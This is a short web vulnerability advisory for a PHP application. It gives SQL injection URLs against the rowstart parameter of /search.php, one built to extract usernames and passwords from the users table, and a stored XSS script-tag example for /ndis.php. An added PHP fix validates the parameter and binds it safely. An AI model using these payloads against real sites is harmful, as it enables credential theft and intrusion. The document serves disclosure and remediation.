1. SQL Injection
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,password,0,0,0%20from%20users/*
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/*
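Added example, not part of the original advisory or the affected application's code: one way to close the rowstart injection, assuming the parameter is an "offset" or "offset,count" value that ends up in the LIMIT clause of the search query. The names parse_rowstart, search_posts, MAX_ROWS and the posts table are hypothetical.

```php
<?php
// Added example, not the application's code. Assumption: rowstart is "offset"
// or "offset,count" and ends up in the LIMIT clause of the search query.
const MAX_ROWS = 100; // hypothetical cap on page size

// Return [offset, count], or null unless rowstart is one or two plain integers.
function parse_rowstart(string $raw, int $defaultCount = 10): ?array
{
    if (!preg_match('/\A(\d{1,9})(?:,(\d{1,9}))?\z/', $raw, $m)) {
        return null;
    }
    $count = isset($m[2]) ? (int)$m[2] : $defaultCount;
    if ($count < 1 || $count > MAX_ROWS) {
        return null;
    }
    return [(int)$m[1], $count];
}

// Search with every request value bound as a parameter, never concatenated.
function search_posts(PDO $db, string $q, string $rowstart): array
{
    $range = parse_rowstart($rowstart);
    if ($range === null) {
        throw new InvalidArgumentException('invalid rowstart');
    }
    $stmt = $db->prepare(
        'SELECT id, title FROM posts WHERE title LIKE :q ORDER BY id LIMIT :cnt OFFSET :off'
    );
    $stmt->bindValue(':q', '%' . $q . '%', PDO::PARAM_STR);
    $stmt->bindValue(':cnt', $range[1], PDO::PARAM_INT);
    $stmt->bindValue(':off', $range[0], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO posts (title) VALUES ('as one'), ('as two'), ('other')");

// A well-formed value, then the rowstart value from the first request above.
foreach (['0,10', '1,10 UNION SELECT 0,0,0,username,password,0,0,0 from users/*'] as $rs) {
    try {
        echo $rs, ' => ', count(search_posts($db, 'as', $rs)), " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo $rs, ' => rejected: ', $e->getMessage(), "\n";
    }
}
```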
2. Cross Site Scripting
/ndis.php
For example, you can create a post like this:
<script>document.write("");</script>